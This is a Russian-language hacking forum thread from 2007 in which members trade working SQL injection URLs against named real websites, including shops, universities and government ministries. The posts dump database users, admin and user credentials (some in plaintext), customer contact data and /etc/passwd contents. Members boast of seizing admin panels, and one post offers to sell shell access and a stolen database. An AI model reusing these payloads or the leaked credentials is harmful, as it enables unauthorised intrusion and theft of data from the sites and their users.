Просмотр полной версии : SQL Инъекции
http://www.franko-theatre.kiev.ua/show.php?id=75'+union+select+1,convert(concat(user (),0x3a,version(),0x3a,database())+using+cp1251)/*
Joker-jar
31.03.2007, 20:27
http://kamazmaster.iww.ru/shop/index.php?productID=1'
Купи КамАЗ :)
http://shop.drengo.it/shopping/index.php?id=-854370+union+select+1,AES_DECRYPT(AES_ENCRYPT(conc at(username,0x3a,password),0x71),0x71),3,4,5,6,7,8 ,9,10,11+from+users/*
все внизу
Constantine
31.03.2007, 21:04
Симпатишная
http://www.winfors.uni-koeln.de/people/main.html?ID=1+union+select+1,concat(user,char(58) ,password),3,4,5,6,7,8,concat_ws(char(58),user(),v ersion(),database())+from+mysql.user/*
2Joker-jar раскрученные выкладываем скули!
Купи КамАЗ
Это я не мог ни поковырять :)
http://www.kamazmaster.iww.ru/shop/index.php?productID=-3%20union%20select%20%20concat_ws(char(58),user(), version(),database())/*
Вывод - Просмотр HTML кода => ctrl+f "hidden name=categoryID value="
http://www.admpokachi.ru/resourse.php?news_id=-1+union+select+concat(username,char(58),user_passw ord),2,3,4+from+phpbb_users+limit+1,1/*
http://www.talka.ru/price/?id=-1+union+select+1,2,3,concat(username,char(58),user _password),5,6,7,8,9,10,11+from+phpbb_users+limit+ 1,1/*
maed.gov.mr
http://www.maed.gov.mr/detailevent.php?id=-113%20UNION%20SELECT%201,2,3,concat(user,0x3a,pass word),5,6+from+mysql.user/*
пасс чегото не выводится=\
Может и было...
http://www.rozenbaum.ru/music/index.php?type=2&id=25&id2=-1+union+select+1,2,3,4,5,concat(database(),char(58 ),user(),char(58),version()),7,8,9/*
http://www.rozenbaum.ru/music/index.php?type=2&id=25&id2=-1+union+select+1,2,3,4,5,concat(username,char(58), user_password),7,8,9+from+forum.phpbb_users+limit+ 1,1/*
Может и было...
http://www.rozenbaum.ru/music/index.php?type=2&id=25&id2=-1+union+select+1,2,3,4,5,concat(database(),char(58 ),user(),char(58),version()),7,8,9/*
http://www.rozenbaum.ru/music/index.php?type=2&id=25&id2=-1+union+select+1,2,3,4,5,concat(username,char(58), user_password),7,8,9+from+forum.phpbb_users+limit+ 1,1/*
Было..
Из этой скули можно "извлечь всё, что только можно" ;)
http://soft.dndz.dp.ua/program.php?id=-459+union+select+1,2,3,table_name,5,6,7,8,9,10,11, 12,13,14,15+from+information_schema.tables+limit+1 4,19/*
http://www.uoasn.ca/pages/en/news.php?aid=-8+union+select+concat(user(),0x3a,version()),conca t(id,0x3a,username,0x3a,password,0x3a,email),3+fro m+web_users/*
menr.gov.ua
Министерство Экологии Украины
препод падла, зачет не поставил =(
http://menr.gov.ua/index.php?menu_id=-1+union+select+1,2,concat(l0gin,char(58),рassword ),4,5,6,7,8,9,1о+from+user/*
http://www.piiter.ru/authors.php?aid=107&pid=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8,9,10,11,12,13,14, 15,16/*
http://www.restoran.ua/index.phtml?t=1&pid=-1+union+select+111,222,3,4,5,6/*
Вывод в titel'е:
http://www.foodbiz.ru/categories.php?folder=-1+union+select+1,concat(version(),char(58),user(), char(58),version()),3,4,5,6,7,8,9,10/*
http://www.interatr.org/rus/inner.php?menu_id=-13+union+select+version()/*&id=80
Плохо получается искать сайты для теста :D
http://www.guruken.ru/list.php?sname='
http://www.spec.bc.ca/news/news.php?newsID=-213+union+select+1,user(),3,database(),5,6,version ()/*
http://www.spec.bc.ca/news/news.php?newsID=-213+union+select+1,table_name,3,column_name,5,6,7+ from+information_schema.columns/*
http://www.spec.bc.ca/news/news.php?newsID=-213+union+select+1,contact_name,3,contact_email,5, 6,contact_phone+from+calendar_event/*
http://www.foodforfun.ru/self.php?id=-1+union+select+1,2,3/*
ы.. пусто.
http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
выводка в title
мб кто дальше додумает, подкину репки +)
http://aei-brookings.org/events/page.php?id=-152+union+select+1,2,3/*
http://kava.lviv.ua/event/index.php?id=-1229+union+select+1,2,3/*
}{0TT@БЬ)Ч
01.04.2007, 01:28
http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
выводка в title
мб кто дальше додумает, подкину репки +)
http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,concat(uname,char(58),pass),5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29+from+xoops_users/*
держи;)
http://www.iwdp.co.uk/profile.php?id=-1+union+select+1,,3,4,null,6,7,8,9,10,11+from+urls
там маджик куотес и вроде все поля строковые так что ничего поиметь неполучилось
http://www.foodforfun.ru/self.php?id=-1+union+select+1,2,3/*
ы.. пусто.
мдя, почему 1,2,3? )
http://www.foodforfun.ru/self.php?id=122+union+select+version(),2
http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
выводка в title
мб кто дальше додумает
mr. nitrox, вы лентяй, там нечего думать ) внизу же написано что xoops.. da i newbb стоит..
http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,concat(uname,0x3a,pass),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29+from+xoops_users+where+uid=1/*
http://bdsm-howto.ru/modules/zmagazine/article.php?articleid=1+and+1=-1+union+select+1,2,3,concat(uname,0x3a,pass),5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29+from+xoops_users+where+uid=4/*
piggy{AZ}:edc52ca4fc24580fec8c11d6b7c5859e
piggy{AZ}:celebes
короч, чистый мд5 там.
http://www.fish.bc.ca/news.php?news_id=-78+union+select+1,concat(user(),0x3a,version(),0x3 a,database()),3/*
InferNo23
01.04.2007, 14:16
http://www.style2ouf.com/us/News/affiche_news.php?id_news=-1+union+select+concat(user,char(58),password),2,3, 4,5,6,7+from+mysql.user/*
http://www.tamizdat.org/article.php?id=99999+union+select+1,2,concat(user, char(58),password),4,5,6,7,8,9,10,11,12,13+from+my sql.user/*
http://www.vtb.no/vis.php?id=-3217+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(conc at(password,0x3a,user),0x71),0x71),4,5,6,7,8,9,10, 11+from+mysql.user+limit+5,1/*
http://www.rushprint.no/artikkel.php?id=-889+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13,14/*
http://www.trondelag-teater.no/forestilling.php?id=-842+union+select+1,version()/*
яндек с.ру :)
показываю только багу, кому интересно - добивайте дальше.
http://tv.yandex.ru/broadcast.xml?id=8043801-1 выдает тоже самое что и
http://tv.yandex.ru/broadcast.xml?id=8043800
описывать дальнейшие действия как использовать скулю не буду, но кто желает купить шелл - в приват. есть доступ к бд, в общем все блага. ДОРОГО!
кому интересно, выцепил из БД пару сотен мыльников с пассами вида pass:login:s_question:s_answer
http://c411k.jino-net.ru/upload/yand.php
Там стоит IPB, префикс таблиц ibf_ , но запрос с "from" не проходит =\
http://www.gta.com.ua/file_details.phtml?id=-204+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20/*
С этим ХЗ как бороться...
http://www.mirposterov.ru/poster.asp?id=228'
http://www.mirposterov.ru/poster.asp?id=-228+order+by+1
http://medichelp.ru/?category=394&page=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8,9,10,11/*
http://www.dengi-info.com/news/?nid=-1+union+select+1,2,3,4,5,convert(concat(database() ,char(58),user(),char(58),version()),char)/*
http://www.salespb.ru/rubr.phtml?id=-1+union+select+concat(database(),char(58),user(),c har(58),version())/*
InferNo23
01.04.2007, 18:48
http://www.gamersinfo.net/content/news.php?id=-1+union+select+1,concat(username,char(58),password ),3,4,5,6,7,8,9+from+user+limit+0,1/*
http://www.rolemancer.ru/sections.php?op=listarticles&secid=-1+union+select+concat(pass,char(58),uname),2,3,4,5 +from+users/*
http://www.shopwell.ru/catalogue/tualet-cabine/?id=-1+union+select+1,2,3,4,concat(database(),char(58), user(),char(58),version()),6,7,8,9,10,11,12,13,14, 15/*
http://www.553333.ru/towar.phtml?id_towar=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21/*
http://www.outside-music.ca/news.php?id=-38+union+select+1,2,3,4,user(),version(),7,databas e(),9,10,11,12,13/*
Constantine
01.04.2007, 20:08
Обещал Грею на 1 апреля выложить стилизованную скулю =)
http://yalma.raokriomrati.com/main.html?id=-1+объединение+выбор+конкат( ерсия(),двоеточие,пользова ель()),конкат_вс(двоеточие,п ользователь,пасс)+из+пользо вателей/*
Оригинал, кстати достаточно гладко
http://yalma.raokriomrati.com/main.html?id=-1+union+select+concat(version(),char(58),user()),c oncat_ws(char(58),user,pass)+from+users/*
http://www.filippok.ru/index.php?s=33&t=-1+union+select+1,2,convert(concat(database(),char( 58),user(),char(58),version()),char),4,5,6,7,8,9,1 0,11,12,13/*
Constantine
01.04.2007, 21:00
http://www.la-belle.nl/nieuws/main.html?id=-17+union+select+convert(version()+using+latin1)/*&pos=0
Магазин, таблицы не осилил =(
http://www.slk-digital.ru/gadgets/?t_id=11+UNION+SELECT+1,2,3,4,5,6,7,8,9/*
http://fri.net.ua/loadpsb.php?id=-520+union+select+1,2,3,4,5,6,7,8,9/*
http://pravopys.vlada.kiev.ua/index.php?id=-12+union+select+version()/*
http://www.parkmanmusik.se/shop.php?id=-1+union+select+1,version(),3,4/*
С е р в и с ы д л я В е б П р о ф е с с и о н а л о в
http://right-web.net/right-design/news.shtml?id=-58+union+select+1,version(),user(),database(),5,6, 7/*
Кто хочет учиться зарубежом?
http://www.gostudy.com.ua/news.phtml?id=-40+union+select+1,version(),3,4,5,6,7,8,9/*
Кто хочет учиться зарубежом?
В Киевском международном соц. институте хочу:) :
http://www.kiis.com.ua/index.php?id=2&sp=1+union+select+1,2,3,4,table_name,6,7,8,9+from+ information_schema.tables/*
http://www.kiis.com.ua/index.php?id=2&sp=1+union+select+1,2,3,4,column_name,6,7,8,9+from +information_schema.columns/*
shops
http://www.theracersgroup.com/shop/car.php?id=-19%20UNION%20SELECT%201,database(),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36/*
http://www.kuchikomi-kobe.com/shop.php?id=-8%20UNION%20SELECT%201,2,user(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55/*
мало того,что иероглифы какието,так еще и таблиц не подобрал=\
http://www.realmusic.ua/catalog/more.php?id=-57+union+select+1,2,3/*
Thanat0z
02.04.2007, 03:34
хз что здесь мона сделать
__http://www.lotok.com.ua/auctiondetails.php?id=57739'+union+select+1/*
__http://www.yurpraktika.com/article.php?id=10007144'
__http://www.johnkeellshotels.com/beach_hotels/hotel_home.php?id=-1'
тут не нашел ничего интересного, судя по названиям таблиц, они больше отдыхают чем работают
__http://www.stcu.int/news/index.php?id=921%20or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT +IN+('WinterPicnic2007','WinterPicnic2006','WebSit e','Vacancies','v_Partners','v_Holidays','v_FieldO fficesReport','v_Autumn2004Results','syssegments', 'sysconstraints','SummerPicnic2005','SummerPicnic2 004','SuccessStoryProjects','SuccessStory','Spring Picnic2006p2','SpringPicnic2006','Sections','Recen tNewsandEvents','Procurement','Picnic','phone','Pa rtners','PartnerContacts','links','Holidays','Fiel dOfficesReport','faxes','E_mails','dtproperties',' Content','conference','Competition','BusReservatio n','Bowling','AutumnPicnic2005p2','AutumnPicnic200 5','Organizer','Articles','AutumnPicnic2004'))--
понравилась вот эта скуля, но до ума не смог довести
__http://www.foto-svadba.com/photographer.php?id=24+union+select+1,2,3,4,5,6,7, 8,9,10,11/*
http://phpinside.org.ua - украинский сервер небезизвестного журнала PHPInside
http://phpinside.org.ua/index.php?mode=download&id=-1+union+select+1,convert(user()+using+cp1251)/*
inside@localhost
http://phpinside.org.ua/index.php?mode=download&id=-1+union+select+1,convert(version()+using+cp1251)/*
4.1.14
смотреть татйт =)
VampiRUS
02.04.2007, 08:47
http://www.partsinfo.ru/news.php?nid=-1+union+select+1,2,3,concat_ws(0x3a,login,password ,email,name),5,6,7+from+users/*
понравилась вот эта скуля, но до ума не смог довести
__http://www.foto-svadba.com/photographer.php?id=24+union+select+1,2,3,4,5,6,7, 8,9,10,11/*
странно у меня получилось
http://www.foto-svadba.com/photographer.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user_n ame,user_password,email),9,10,11+from+users+limit+ 1,1/*
1ten0.0net1
02.04.2007, 13:25
http://cards.udaff.com/viewcat.php?id=7+order+by+1/*
/home/udaff.com/cards/cards.udaff.com/functions.php
cards@devil
http://cards.udaff.com/viewcat.php?id=-7+union+select+VERSION()/*
5.0.32-Debian_7etch1-log
http://cards.udaff.com/viewcat.php?id=-7+union+select+1+from+mysql.user/*
http://cards.udaff.com/viewcat.php?id=-7+union+select+table_name+from+information_schema. tables/*
http://cards.udaff.com/viewcat.php?id=-7+union+select+table_name+from+information_schema. tables+limit+1,1/*
http://cards.udaff.com/viewcat.php?id=-7+union+select+table_name+from+information_schema. tables+limit+16,1/*
cards_cards
cards_cats
cards_comments
cards_log
helen
Admins
Articles
Поля в таблице admins не искал.
PS: IP на один меньше оригинального удава.
PPS: Тут намекают, что боян. Если так - извиняйте. анриал искать боян или нет по все теме.
Юзера не подобрал:
http://stopusa.be/scripts/texte.php?section=&langue=3&id=-25094+union+select+1,2,passwd,4,5,6,7,8,9,10+from+ users/*
держи
http://stopusa.be/scripts/texte.php?section=&langue=3&id=-25094+union+select+1,aid,passwd,4,5,6,7,8,9,10+fro m+users/*
http://stopusa.be/scripts/admin
User: Roland
Pass: katakas
Constantine
02.04.2007, 14:17
http://www.liliande.com/main.html?id=5&taal_id=9999999+union+select+1,2,3,4,convert(conca t(version(),char(58),user(),char(58),database())+u sing+latin1),6,7/*
}{0TT@БЬ)Ч
02.04.2007, 14:50
2VampiRUS,_Pantera_
а http://www.yurpraktika.com/article.php?id=10007200'
че не позубам? :D :D :D
правда таблицы не нашел но хоть что то ;)
http://www.yurpraktika.com/article.php?id=10007200+and+10007200=-10007200+union+select+1,2,3,4,5,null,user(),8,9,10 ,database(),version(),13,14,15,null,17,18,19,20,21 ,22,null,null,25,null/*
красава :p
http://uralmag.ru/index.html?col=1&tovar_id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20/*
http://uralmag.ru/index.html?col=1&tovar_id=-1+union+select+1,2,concat(clients_fio,char(58),cli ents_phone,char(58),clients_login,char(58),clients _password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20+from+clients+limit+0,1/*
Филосовский факультет МГУ. http://www.philos.msu.ru/
Видно что философы, а не пхп кодеры(:
Скуль:
http://www.philos.msu.ru/library.php?sid=2'
Колумны:
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11
Версия мускула 5.0.27 :
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11
Следовательно:
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+INFORMATION_SCHEMA.TABLES/*
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,COLUMN_NAME,4,5,6,7,8,9,10,11+f rom+INFORMATION_SCHEMA.COLUMNS/*
Колонка CHARACTER_SET_NAME
Таблица CHARACTER_SETS
Так что только:
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,login,3,4,5,6,7,8,9,10,11+from+us ers
=\
Ой, чувствую не поймут меня =)
http://www.dafna.ru/catalog/good/?module=52&id=11110+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,version(),38
http://photo.dive.kz/photo.php?id=-784+union+select+1,2,3,concat(database(),0x3a,user (),0x3a,version()),5,6/*
Какой то векторлинукс, в первый раз слышу. http://vectorlinux.com/ Ну да пох=\
Скуль:
http://vectorlinux.com/article.php?sid=40'
Колумны:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,4,5,6,7,8
Версия 4.1.20:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,VERSION(),5,6,7,8
Т.к. мускул ниже 5 ветки, то тупо перебераем таблицы.
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,4,5,6,7,8+from+users
Что бы небыло ебли с именами колонок, смотрим форму авторизации:
Nickname: <input type="text" name="uname" size="12" maxlength="25" /><br />
Password: <input type="password" name="pass" size="12" maxlength="20" /><br />
Ибо:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,concat(uname,0x3a,pass),5,6, 7,8+from+users
Tigger:dd0ced770c9b3a5209a1c48dba1c6d86
Всё=\
http://www.antikvar.su/index.php?http_id_part=77&http_id_prod=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17/*
http://www.antikvar.su/index.php?http_id_part=77&http_id_prod=-1+union+select+1,concat(client,char(58),phone),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17+from+request+li mit+0,1/*
http://www.baltex.ru/rus/news/region/yug/?id=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8/*
http://www.baltex.ru/rus/news/region/yug/?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor mation_schema.tables+limit+38,1/*
http://kvadroplast.perm.ru/catalog.html?cat=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8/*
Кстати я тоже имена колонок смотрю в исходниках формы - почти всегда прокатывает, и ни какие информатион_счема не нужны, хотя с ними тоже не плохо))
Add:
Хотя если поиграть с лимитами, выдаёт другого юзера:
http://vectorlinux.com/article.php?sid=-40+union+select+1,2,3,concat(uname,0x3a,pass),5,6, 7,8+from+users+limit+1,1
Колонка CHARACTER_SET_NAME
Таблица CHARACTER_SETS
Так что только:
ЛОЛ =D
а лимит уже не рулит что ли?
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+INFORMATION_SCHEMA.TABLES+limit+1,1/*
ЛОЛ =D
а лимит уже не рулит что ли?
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+fr om+INFORMATION_SCHEMA.TABLES+limit+1,1/*
И это чем то помогло? =\
омфг, Слип. Иди статью Зако почитай =\
Поздравьте меня! Мой первый скуль :
http://www.russianst.com/mobile/phone.php?p=1'
Поле там вроди одно
http://www.russianst.com/mobile/phone.php?p=-1+union+select+1
:)
']И это чем то помогло? =\
меня глючит или пароль не выведен? колонка 'passw'
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,concat(login,0x3a,passw),4,5,6, 7,8,9,10,11+from+users/*
admin:a98948bf0421ef30e4e19c0b4844600d
ну и от меня еще:
restko.ru
http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(user,0x3a,password) +using+cp1251)+from+mysql.user/*
root_s194u:*FB96B86F2CB3B44E1F1854B65E4333A1649F18 6B
к мускул..
http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(email,0x3a,pass)+us ing+cp1251)+from+user/*
пароли в чистом виде.. пример - restko@restko.ru:rel021
//upd:
Поздравьте меня! Мой первый скуль :
Поле там вроди одно
:)
а вроде нет.. двадцать два :D
http://www.russianst.com/mobile/phone.php?p=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22/*
дальше сам думай)
Constantine
02.04.2007, 19:36
http://www.content-c.ru/level.php?id=-22+union+select+1,2,3,concat_ws(char(58),user(),da tabase(),version()),5,6,7,8,9,10,11,12,13,14,15/*
p.s 500 мессяга
меня глючит или пароль не выведен? колонка 'passw'
http://www.philos.msu.ru/library.php?sid=-1+union+select+1,2,concat(login,0x3a,passw),4,5,6, 7,8,9,10,11+from+users/*
admin:a98948bf0421ef30e4e19c0b4844600d
/me ступил=\\\
Вот мой второй скуль)
http://svadba.irk.ru/catalog.php?id=1'
Поля...
http://svadba.irk.ru/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8
А чёто все остальное не катит..
=faraon=
02.04.2007, 20:25
Скуль :
http://www.elit-flowers.ru/katalog-list.php?code=1'
Поля :
http://www.elit-flowers.ru/katalog-list.php?code=-1+union+select+1,2,3,4,5
runiga.com
Испанская недвижимость, российское представительство.
сайт:
http://www.runiga.com/ruso/home.php?pageid=189&idioma=-1+union+select+1,2,3,concat(login,0x3a,passwd),5,6 ,7,8,9+from+users/*
список юзер:пасс в открытом виде.
форум phpbb:
http://www.runiga.com/ruso/home.php?pageid=189&idioma=-1+union+select+1,2,3,concat(username,0x3a,user_pas sword),5,6,7,8,9+from+phpbb_users/*
Admin:aa7cae5a92226d97ba0654db0dd070b1 = pa2310
вуаля, админка захвачена
1.5k юзеров вроде.. :)
http://www.oxid.ru/notes/show.php?stid=-2045+union+select+1,2,concat(login,char(58),pass,c har(58),email),4,5,6,7,8,9,0,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,load_file(0x2f6574632f7061 73737764),27,28,29,30,31,32,33,34+from+users/*
На этом сайте можно все:)
Но, к сожаления, практическая польза отсутствует(
-----------------------------------
Вот еще одна
http://xlinenn.ru/shop.php?cats=-187+union+select+1,2+from+user/*
http://www.saratoff-road.ru/?showtov=-1+union+select+1,database(),3,user(),version(),6,7/*
http://www.saratoff-road.ru/?showtov=-1+union+select+1,2,3,concat(login,char(58),pass),5 ,6,7+from+users/*
http://www.dengi-info.com/
http://www.dengi-info.com/news/?nid=-40097+union+select+1,2,3,4,5,6/*
собствено ничего интресного не нашел, можеть кто нить другой найдет
МИНИСТЕРСТВО ТРУДА И СОЦИАЛЬНОЙ ЗАЩИТЫ НАСЕЛЕНИЯ РЕСПУБЛИКИ КАЗАХСТАН
http://www.enbek.kz/law/lawdetail.php?recordID=-121+union+select+1,2,concat(login,char(58),passwd) +from+admin/*
http://www.enbek.kz/law/lawdetail.php?recordID=-121+union+select+1,2,LOAD_FILE(0x2f6574632f7061737 37764)/*
ищем админку
http://www.mk-rossi.ru/?page=prod&id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version())/*
http://www.mk-rossi.ru/?page=prod&id=-1+union+select+1,2,table_name+from+information_sch ema.tables+limit+25,1/*
http://www.mk-rossi.ru/?page=prod&id=-1+union+select+1,2,column_name+from+information_sc hema.columns+where+table_name=char(97,99,99,95,97, 100,109,105,110,95,117,115,101,114,115)+limit+0,1/*
http://www.mk-rossi.ru/?page=prod&id=-1+union+select+1,2,concat(id,char(58),name,char(58 ),content,char(58),password,char(58),email,char(58 ),fio,char(58),dolznost,char(58),user_group)+from+ acc_admin_users/*
Женский журнал Роксо
http://roxo.kiev.ua/showarticle.php?id=-348+union+select+1,2,3,4,5,6/*
http://www.idealist.kz/news.php?id=-4780+union+select+1,2,user(),4,5,6,7/*
ппц понедельник день тяжелый=\
ssk.ex0.uf0
02.04.2007, 23:21
на 41-ой чуть ап стену не убился(( подскажите в чём ошибка...с меня +
http://www.jlu.edu.cn/news/new/php/view.php?id=2450'+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
ппц...лучше бы убился...
http://www.healthyskepticism.org/library/ref.php?id=9734'+union+select+1,2/*
http://www.avtosreda.ru/new/new.php?id=2657'+union+select+1,2/*
ЗЫ ушол книжки читать умные...(
Наше радио
http://www.nashespb.ru/clubs.php?id=-8+union+select+1,2,3,4,5,6,7,8,9/*
http://www.rikt.ru/news/kvant/index.phtml?cur_date=2006-01-10&id_news=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7/*
ssk.ex0.uf0
1) http://www.jlu.edu.cn/news/new/php/view.php?id=2450+order+by+10
2) http://www.healthyskepticism.org/library/ref.php?id=97340+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20/*
3) http://www.avtosreda.ru/new/new.php?id=26570+union+select+1,2,3,4,5,6/*
www.uralmedia.ru
ПрофессиАНАЛЬНЫЙ хостинг =\
http://www.uralmedia.ru/news.php3?id=-80+union+select+1,concat(user,0x3a,password),3,4,5 ,6+from+mysql.user/*
Таже каша :
http://www.megatrac.ru/news.php3?id=-72+union+select+1,concat(user,0x3a,password),3,4,5 ,6+from+mysql.user/*
root:572587631e9a0a92
}{0TT@БЬ)Ч
03.04.2007, 00:26
ssk.ex0.uf0
http://www.jlu.edu.cn/news/new/php/view.php?id=2450+order+by+10
и че это,ты пробывал выводить то?
2ssk.ex0.uf0
админский акк
http://www.avtosreda.ru/new/new.php?id=26570+union+select+1,2,concat(username, char(58),user_password),4,5,6+from+phpbb_users+lim it+1,1/*
www.mipki.spb.ru
межотраслевой институт подготовки кадров и информации =\
http://www.mipki.spb.ru/news.php3?id=-248+union+select+1,2,concat(database(),0x3a,user() ,0x3a,version()),4,5,6/*
}{0TT@БЬ)Ч
03.04.2007, 00:54
Наше радио
http://www.nashespb.ru/clubs.php?id=-8+union+select+1,2,3,4,5,6,7,8,9/*
итересный форум там стоит, можно залить вместо фотки шелл тока толку от него :(
http://www.a1tv.ru/AOpenNews.php?NewsID=-381+union+select+1,2,3,4,5,concat(user_email,char( 58),user_icq,char(58),user_password),7,8+from+phpb b_users+limit+1,1/*
http://www.xmlhack.com/author.php?id=-8+union+select+1,2,3/*
http://www.llewellyn.com/bookstore/author.php?id=-38182+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
http://poetryclub.com.ua/author.php?id=-756+union+select+1,2,3,4,5,6,7,8,9/*
http://www.brcinfo.ru/authors/author.php?id=-20+union+select+1,2,3,4,5,6,7,8,9/*
http://www.trizway.com/author.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
http://pstbi.pagez.ru/author.php?id=-5+union+select+1,2/*
http://www.runiga.com/ruso/home.php?pageid=190&id=-4834+union+select+1,2,3,concat(user_icq,char(58),u ser_password),5,6,7,8,9+from+phpbb_users+limit+3,1/*
http://thelist.ru/link.php?id=-84680+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19/*
Thanat0z
03.04.2007, 04:31
ну и от меня еще:
restko.ru
http://www.restko.ru/index.php?level=99&info=-99+union+select+convert(concat(user,0x3a,password) +using+cp1251)+from+mysql.user/*
боян :)
а вот от меня, к сожалению 3 версия скорее всего
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+4/*
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+8/*
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+order+by+9/*
http://www.montenegrostars.com/new/hoteli.php?id_hot=1&id_jez=1+AND+ascii(lower(substring(version(),1,1)) )=52/*
здесь ничего интересного:
http://www.iwdp.co.uk/profile.php?id=-220+union+select+1,name,3,4,5,6,7,8,9,10,11+from+r egions/*
здесь не смог сделать вывод (название знакомое, кажется уже ковырял эту скулю)
http://www.biodiversityscotland.gov.uk/pageType1.php?id=2&type=1&navID=-27+union+select+1,2,3,4,5,6/*
2Thanat0z
/me смеялся =)
http://www.biodiversityscotland.gov.uk/pageType1.php?id=-2+union+select+1,concat(database(),0x3a,user(),0x3 a,version()),3,4,5/*&type=1&navID=27
http://www.no2anticommunism.org/ru/index.php?info=doc&Id=-40+union+select+1,passwd,3,4,5,6,7,8,9,10,11,12+fr om+users/*
http://socdvig.org.ru/index.php?action=viewnews&id=-31+union+select+1,2,3,4,5,6,7+from+users/*
Сайт http://www.singletrackworld.com/ Одна большая скуль инъекция.
Inj:
http://www.singletrackworld.com/article.php?sid=2317'
Одна колумна, таблица users. Мускул версии 5.0.22 (Весь вывод в title)
Теперь через лимит дёргаем пассы.
http://www.singletrackworld.com/article.php?sid=-2317+union+select+concat(uname,0x3a,pass)+from+use rs+limit+*,1
add:
Звёздочку поставил, ибо на первом месте стоит походу не админ. Дальше уже перебором.=]
VampiRUS
03.04.2007, 12:07
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,concat_ws (0x3a,username,user_password,user_email)+from+phpb b_users+limit+4,1/*
лимит вывод ограничивает, а то скрипт наровит всё вывести.
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,email+fro m+emails+limit+1206,1/*
а тут просто мыла
жалко только до данных моделей чёт не смог добраться
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,8+from+mo dels/*
http://game.hutor.ru/battlenet/stats.php?game=STAR&type=0
Это вроде тож скуль.
пфф, вы название темы видели? =\
